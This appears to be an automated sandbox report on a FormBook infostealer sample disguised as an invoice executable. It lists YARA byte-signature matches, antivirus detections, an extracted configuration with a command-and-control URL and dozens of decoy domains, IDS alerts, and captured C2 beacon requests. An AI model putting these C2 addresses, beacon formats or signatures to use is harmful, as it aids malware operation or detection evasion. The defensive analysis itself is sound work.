3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 22 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.littlesportsacademy.com/cxep/"], "decoy": ["estateglobal.info", "loransstore.com", "loginofy.com", "fjallravenz.online", "cefseguranca-app.com", "safontadiestramiento.com", "bubbleteapro.com", "morethanmummies.com", "serviciopersonalizadoweb.com", "headerbidder.info", "skworkforce.com", "heightsorthodontics.com", "chulavistapd.com", "southjerseyautobody.net", "chargedbygratitude.com", "meltingpotspot.com", "gdjiachen.com", "luckdrawprogram.com", "vintagepaseo.com", "bequestslojyh.xyz", "layeredrofbes.xyz", "com-weekly.email", "suddisaddu.com", "jnlord.com", "outerverse.ventures", "terraroyale.com", "hairclub.info", "rent2owninusa.com", "pmaonline.xyz", "wearecampo.com", "multiplezonesplit.com", "angry-mandala.com", "ikigaiofficial.store", "princewoodwork.store", "moviesaver24.com", "btec-solutions.com", "valurgrayenterprises.com", "homesofsilverspur.com", "leysy-y-nazareno.com", "grade8.tech", "ammarus.com", "researchjournal.net", "nicolaslacasse.com", "khukhuantainha.com", "resultlv.com", "toraportal.com", "wickedhunterworld.com", "clickspromolp.com", "b148tlrnd09ustnnaku2721.com", "high-low-ga.info", "norcalfirewoodllc.com", "fatima2021.com", "aaronsmathquest.com", "decal-mania.com", "spitfiredefenceindustries.com", "mireyita.com", "simonhaidomous.com", "roofingcontractorhickory.com", "mgav69.xyz", "spacebymeghan.com", "hot144.com", "mmfirewood.net", "akshayaasri.com", "bilgisayarimnekadar.com"]}

Multi AV Scanner detection for submitted file

Source: HIRE SOA FOR DEC_2021.exe	Virustotal: Detection: 41%			Perma Link
Source: HIRE SOA FOR DEC_2021.exe	ReversingLabs: Detection: 37%

Yara detected FormBook

Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.fjallravenz.online/cxep/?oL08qf=sGuO4U2D4QpvxfM4Tie03jNQ5o3Udlnj3BRVJisDJxm1gCdwebUZDD2ARlBl478rs+gp&r4e=MFQPj4OXxHZ8i	Avira URL Cloud: Label: phishing
Source: http://www.simonhaidomous.com/cxep/?oL08qf=UgSNVuZrhE3Z8z0ZgFZcy2vBLKCwBFY+sTDX0qorCT9gsCOpfKa0UREUH3qfIqk5g45k&r4e=MFQPj4OXxHZ8i	Avira URL Cloud: Label: malware
Source: www.littlesportsacademy.com/cxep/	Avira URL Cloud: Label: malware
Source: http://www.spacebymeghan.com/cxep/?oL08qf=ptEMQJ9wcGHn8Y3e8b7dTbimCX2/D160Z9ziomc9eLzNI2egxKU0hugwHCLO4F78raSg&r4e=MFQPj4OXxHZ8i	Avira URL Cloud: Label: malware
Source: http://www.akshayaasri.com/cxep/?oL08qf=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hnRLry+JL4w&r4e=MFQPj4OXxHZ8i	Avira URL Cloud: Label: malware
Source: http://www.morethanmummies.com/cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: HIRE SOA FOR DEC_2021.exe

Joe Sandbox ML: detected

Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.1.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.2.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.3.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.ipconfig.exe.325796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.ipconfig.exe.28f11e8.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: HIRE SOA FOR DEC_2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: ipconfig.pdb source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.728290163.0000000002610000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.728290163.0000000002610000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: HIRE SOA FOR DEC_2021.exe, 00000001.00000003.662712540.000000001AE50000.00000004.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000001.00000003.664381253.000000001ACC0000.00000004.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727845226.0000000000C3F000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: HIRE SOA FOR DEC_2021.exe, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727845226.0000000000C3F000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_00405D7C FindFirstFileA,FindClose,	1_2_00405D7C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004053AA
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49795 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49795 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49795 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49800 -> 154.212.212.21:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49800 -> 154.212.212.21:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49800 -> 154.212.212.21:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49827 -> 142.250.203.115:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49827 -> 142.250.203.115:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49827 -> 142.250.203.115:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.estateglobal.info
Source: C:\Windows\explorer.exe	Network Connect: 212.1.210.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.86.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.com-weekly.email
Source: C:\Windows\explorer.exe	Domain query: www.mmfirewood.net
Source: C:\Windows\explorer.exe	Network Connect: 52.6.230.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.akshayaasri.com
Source: C:\Windows\explorer.exe	Domain query: www.fjallravenz.online
Source: C:\Windows\explorer.exe	Domain query: www.morethanmummies.com
Source: C:\Windows\explorer.exe	Domain query: www.simonhaidomous.com
Source: C:\Windows\explorer.exe	Network Connect: 154.212.212.21 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.spacebymeghan.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.littlesportsacademy.com/cxep/

Source: Joe Sandbox View	ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE

Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=sGuO4U2D4QpvxfM4Tie03jNQ5o3Udlnj3BRVJisDJxm1gCdwebUZDD2ARlBl478rs+gp&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.fjallravenz.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQM++WQWQx0o&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.mmfirewood.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=UgSNVuZrhE3Z8z0ZgFZcy2vBLKCwBFY+sTDX0qorCT9gsCOpfKa0UREUH3qfIqk5g45k&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.simonhaidomous.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=ptEMQJ9wcGHn8Y3e8b7dTbimCX2/D160Z9ziomc9eLzNI2egxKU0hugwHCLO4F78raSg&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.spacebymeghan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hnRLry+JL4w&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.akshayaasri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.morethanmummies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.morethanmummies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 160.153.136.3 160.153.136.3

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Fri, 28 Jan 2022 12:43:52 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 28 Jan 2022 12:43:58 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72

Source: HIRE SOA FOR DEC_2021.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: HIRE SOA FOR DEC_2021.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ipconfig.exe, 00000008.00000002.924948301.00000000033D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: ipconfig.exe, 00000008.00000002.924948301.00000000033D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: unknown

DNS traffic detected: queries for: www.fjallravenz.online

Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=sGuO4U2D4QpvxfM4Tie03jNQ5o3Udlnj3BRVJisDJxm1gCdwebUZDD2ARlBl478rs+gp&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.fjallravenz.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=tKr7e/ysfkFa3UQ2/S4tB4cSlqebmf+Bdoeimz8jp9iwh3bj6jf6wnxNjQM++WQWQx0o&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.mmfirewood.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=UgSNVuZrhE3Z8z0ZgFZcy2vBLKCwBFY+sTDX0qorCT9gsCOpfKa0UREUH3qfIqk5g45k&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.simonhaidomous.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=ptEMQJ9wcGHn8Y3e8b7dTbimCX2/D160Z9ziomc9eLzNI2egxKU0hugwHCLO4F78raSg&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.spacebymeghan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=Byxtzwy9R0GD0IyvX+TGY0P09qT9QyNZPQIOfaNvzxOEg7PFqVlYKXle2hnRLry+JL4w&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.akshayaasri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.morethanmummies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cxep/?oL08qf=PktwisKIh9eqiZaZPdqfCAueqx7lopJ2FQkTMDOUcG0hgTiBceSgN5Z4VAFzyceEWpkB&r4e=MFQPj4OXxHZ8i HTTP/1.1Host: www.morethanmummies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

